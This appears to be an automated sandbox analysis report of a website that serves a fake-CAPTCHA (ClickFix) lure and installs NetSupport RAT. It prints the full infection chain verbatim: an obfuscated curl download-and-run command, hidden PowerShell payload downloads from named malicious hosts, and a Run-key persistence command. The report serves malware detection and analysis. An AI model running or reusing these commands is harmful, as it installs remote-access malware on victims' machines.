Windows Analysis Report
http://fountainofhealth.ca

Overview

General Information

Sample URL: http://fountainofhealth.ca
Analysis ID: 1696974

Detection

NetSupport RAT, CAPTCHA Scam ClickFix
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detect drive by download via clipboard copy & paste
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Delayed program exit found
HTML page adds suspicious text to clipboard
HTML page contains obfuscated javascript
Installs a global event hook (focus changed)
Installs a global keyboard hook
Obfuscated command line found
Powershell drops PE file
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a global mouse hook
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Potentially Suspicious Rundll32 Activity
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Uses threadpools to delay analysis
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 7136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 2128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 5584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://fountainofhealth.ca" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • rundll32.exe (PID: 7060 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 , MD5: EF3179D498793BF4234F708D3BE28633)
  • osk.exe (PID: 7252 cmdline: "C:\Windows\system32\osk.exe" MD5: 745F2DF5BEED97B8C751DF83938CB418)
  • osk.exe (PID: 5744 cmdline: "C:\Windows\system32\osk.exe" MD5: 745F2DF5BEED97B8C751DF83938CB418)
    • explorer.exe (PID: 4280 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • conhost.exe (PID: 4124 cmdline: "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 676 cmdline: cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7264 cmdline: cmd.exe /c cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • cmd.exe (PID: 7288 cmdline: cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • cmd.exe (PID: 740 cmdline: cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • curl.exe (PID: 7116 cmdline: curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
          • cmd.exe (PID: 3664 cmdline: C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 688 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 2500 cmdline: powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • client32.exe (PID: 6788 cmdline: "C:\Users\user\AppData\Roaming\Options\client32.exe" MD5: EE75B57B9300AAB96530503BFAE8A2F2)
            • reg.exe (PID: 1516 cmdline: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cleanup
No reasoning has been found
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Options\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\Options\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\Options\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\Options\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000025.00000002.2412047042.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000025.00000002.2428598700.00000000111E1000.00000004.00000001.01000000.00000010.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000025.00000000.1919964679.0000000000D3F000.00000002.00000001.01000000.0000000F.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
37.0.client32.exe.d30000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
37.2.client32.exe.707b0000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
34.2.powershell.exe.28fcf164fe0.2.raw.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
34.2.powershell.exe.28fcf0141a8.1.raw.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
37.2.client32.exe.6cf80000.4.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
0.2.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam/ ClickFix | Joe Security |

                                  System Summary

                                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3664, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , ProcessId: 688, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Tim Rauch: Data: Command: "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter, CommandLine: "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter, CommandLine|base64offset|contains: , Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4280, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press Enter, ProcessId: 4124, ProcessName: conhost.exe
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Options\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 1516, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Support11
                                  Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3664, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f, ProcessId: 1516, ProcessName: reg.exe
                                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2500, TargetFilename: C:\Users\user\AppData\Roaming\Options\HTCTL32.DLL
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3664, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f, ProcessId: 1516, ProcessName: reg.exe
                                  Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,, CommandLine: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3728, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,, ProcessId: 7060, ProcessName: rundll32.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3664, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , ProcessId: 688, ProcessName: powershell.exe
                                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3664, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , ProcessId: 688, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3664, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" , ProcessId: 688, ProcessName: powershell.exe

                                  Remote Access Functionality

                                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2500, TargetFilename: C:\Users\user\AppData\Roaming\Options\NSM.LIC
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-05-22T17:04:35.910960+0200 | 2061385 | 1 | Exploit Kit Activity Detected | 192.168.2.17 | 55881 | 1.1.1.1 | 53 | UDP
2025-05-22T17:04:35.911182+0200 | 2061385 | 1 | Exploit Kit Activity Detected | 192.168.2.17 | 61783 | 1.1.1.1 | 53 | UDP
2025-05-22T17:04:36.632094+0200 | 2061388 | 1 | Exploit Kit Activity Detected | 192.168.2.17 | 49733 | 23.23.49.179 | 443 | TCP
2025-05-22T17:04:33.346833+0200 | 2035894 | 1 | A Network Trojan was detected | 192.168.2.17 | 49796 | 94.158.245.131 | 443 | TCP
2025-05-22T17:04:33.346833+0200 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.17 | 49796 | 94.158.245.131 | 443 | TCP
2025-05-22T17:05:56.618907+0200 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.17 | 49796 | 94.158.245.131 | 443 | TCP
2025-05-22T17:05:42.030046+0200 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.17 | 49795 | 35.206.121.228 | 443 | TCP

                                  AV Detection

                                  Source: https://lang3666.top/lv/xfa.jsAvira URL Cloud: Label: malware
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeReversingLabs: Detection: 18%
                                  Source: C:\Users\user\AppData\Roaming\Options\remcmdstub.exeReversingLabs: Detection: 16%
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeCode function: 37_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,37_2_110AD570

                                  Phishing

                                  Source: Yara matchFile source: 0.2.pages.csv, type: HTML
                                  Source: https://islonline.org/d.jsHTTP Parser: (function(_0x56c4d6,_0x1184e4){const _0x47dcd9=_0x11e7,_0x1961fe=_0x56c4d6();while(!![]){try{const _
                                  Source: https://fountainofhealth.ca/enHTTP Parser: No favicon
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Options\msvcr100.dllJump to behavior
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF100000.00000004.00000800.00020000.00000000.sdmp, client32.exe
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb7 source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000025.00000002.2412047042.0000000000D32000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF157000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,37_2_1102D330
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,37_2_11065890
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,37_2_1106A0A0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,37_2_111266E0
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,37_2_1110AFD0
                                  Source: chrome.exe Memory has grown: Private usage: 18MB later: 61MB

                                  Networking
                                  Source: Network traffic Suricata IDS: 2061385 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (islonline .org) : 192.168.2.17:61783 -> 1.1.1.1:53
                                  Source: Network traffic Suricata IDS: 2061385 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (islonline .org) : 192.168.2.17:55881 -> 1.1.1.1:53
                                  Source: Network traffic Suricata IDS: 2061388 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (islonline .org) : 192.168.2.17:49733 -> 23.23.49.179:443
                                  Source: Network traffic Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.17:49796 -> 94.158.245.131:443
                                  Source: Network traffic Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.17:49796 -> 94.158.245.131:443
                                  Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.17:49795 -> 35.206.121.228:443
                                  Source: unknown TCP traffic detected without corresponding DNS query: 51.132.193.104
                                  Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
                                  Source: unknown TCP traffic detected without corresponding DNS query: 52.109.28.46
                                  Source: unknown TCP traffic detected without corresponding DNS query: 52.123.128.14
                                  Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
                                  Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknown TCP traffic detected without corresponding DNS query: 184.86.251.25
